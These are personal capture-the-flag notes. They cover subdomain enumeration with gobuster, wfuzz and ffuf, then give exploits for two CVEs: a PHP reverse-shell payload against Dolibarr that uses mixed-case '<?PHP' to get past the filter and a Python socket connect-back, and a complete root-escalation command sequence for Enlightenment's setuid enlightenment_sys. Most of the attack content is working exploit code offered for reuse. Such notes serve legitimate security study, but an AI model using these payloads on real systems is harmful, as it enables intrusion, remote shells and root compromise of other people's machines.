CTF Notes: 2024-05-26 CVE-2023-30253 CVE-2022-37706
enum
- gobuster
gobuster -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt vhost -u http://
- wfuzz
wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u “http://
/” -H “Host: FUZZ. ”
- fuff
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://
/ -H “Host: FUZZ. ” -fl 10
CVE-2023-30253
Dolibarr is a web-based suite of features for managing all aspects of your business, from CRM and sales to accounting and manufacturing. It is customisable, extensible, and available on various platforms, as a local or cloud application.
- This vulnerability is on input validation, where the
php
keyword filtering can be bypassed using mixed case letters, e.gPHP
,PhP
- Common config file path: conf/conf.php
- To exploit this vulnerability, one needs to check that the current user has read/write permission to website/content at
http://site/user/perms.php
- Then create a website and page at
http://site/website/index.php
- Create a website and a page,
Enable shown dynamis content
- Example payload for reverse shell:
<section id="mysection1" contenteditable="true">
<?PHP
echo system('python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'');
?>
</section>
CVE-2022-37706
enlightenment_sys in Enlightenment before 0.25.4 allows local users to gain privileges because it is setuid root, and the system library function mishandles pathnames that begin with a /dev/.. substring.
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
enlightenment_sys /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net